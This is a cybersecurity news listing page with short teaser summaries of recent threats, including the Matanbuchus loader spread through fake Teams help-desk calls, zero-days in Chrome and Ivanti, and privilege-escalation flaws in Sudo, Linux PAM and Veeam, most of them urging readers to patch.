Teams Drops Sneaky Matanbuchus Malware

Fake “IT Help Desk” Teams Calls Drop Sneaky Matanbuchus 3.0 Malware Researchers have spotted Matanbuchus 3.0, an upgraded malware‑as‑a‑service loader, being pushed through Microsoft Teams calls that pose as helpful IT staff. Targets are tricked into launching Quick Assist, granting attackers remote access so they can run a PowerShell script that drops the loader. Matanbuchus 3.0 boasts […]

Read More

Google fix for active Chrome zero-day

Google rushes out fix for active Chrome zero-day CVE-2025-6554 – a critical vulnerability in Chrome’s V8 engine – is being exploited right now, so Google has released an out-of-band patch. What happened? • A type-confusion bug lets an attacker craft a web page that reads or writes arbitrary memory, paving the way for full code […]

Read More

Hidden threats in normal traffic

Why “Innocent” Network Traffic May Be Your Biggest Cyber Risk Threat actors increasingly disguise malicious activity as normal network traffic: 80 % of attacks in CrowdStrike’s 2025 report were “malware-free,” relying on credential theft, DLL hijacking and other living-off-the-land tactics. Traditional edge devices and EDR miss much of this traffic—Verizon notes breaches via VPNs and […]

Read More

zero-day spree hits Ivanti gateways

Chinese hackers weaponise new Ivanti CSA bugs to hit French public and private sector Chinese threat group “Houken” (overlapping Google Mandiant’s UNC5174) exploited three zero-day flaws in Ivanti Cloud Services Appliance (CSA) – CVE-2024-8963, CVE-2024-9380 and CVE-2024-8190 – to breach French government, telecoms, media, finance and transport bodies in September 2024. According to France’s cyber-security […]

Read More

hidden weaknesses in AI SOC tools

The hidden weaknesses in AI SOC tools AI-driven Security Operations Centre (SOC) platforms promise faster triage and fewer false alarms, yet most depend on pre-trained models that only recognise a narrow set of threats. These fixed models can’t keep up with today’s constantly shifting alert landscape, forcing analysts back to manual work whenever an unfamiliar […]

Read More

Sudo privilege-escalation double punch

Critical Sudo Bugs Hand Attackers Root Access – Patch Now Security researchers have uncovered two flaws in the ubiquitous Sudo utility that let any local user on vulnerable Linux and Unix-like systems gain root. • CVE-2025-32462 (CVSS 2.8) – a 12-year-old bug in the -h host option lets commands permitted for a different host run […]

Read More

Stop using factory passwords

Iranian attackers recently manipulated a small U.S. water-treatment station simply by logging in with the factory-set password “1111”. The incident led CISA to repeat years-old advice: default credentials remain one of the most abused weaknesses in operational-technology (OT) and IoT environments. Default passwords survive because they simplify initial set-up and bulk provisioning, yet they invite […]

Read More

Critical Veeam Backup Vulnerability

Veeam rushes out fix for critical backup flaw Veeam has issued updates for Backup & Replication after researchers from CODE WHITE and watchTowr disclosed CVE-2025-23121, a remote-code-execution bug scored 9.9/10.0 on the CVSS scale. The flaw affects every Version 12 build up to 12.3.1.1139 and lets an authenticated Windows domain user run arbitrary code on […]

Read More

Linux flaws let local users grab root

New Linux Bugs Give Attackers Instant Root – Patch Now Security firm Qualys has revealed two local-privilege-escalation bugs that, when chained, let any logged-in user on most Linux distributions become root in seconds. • CVE-2025-6018 sits in the PAM configuration shipped with openSUSE Leap 15 and SUSE Linux Enterprise 15, allowing a normal user to […]

Read More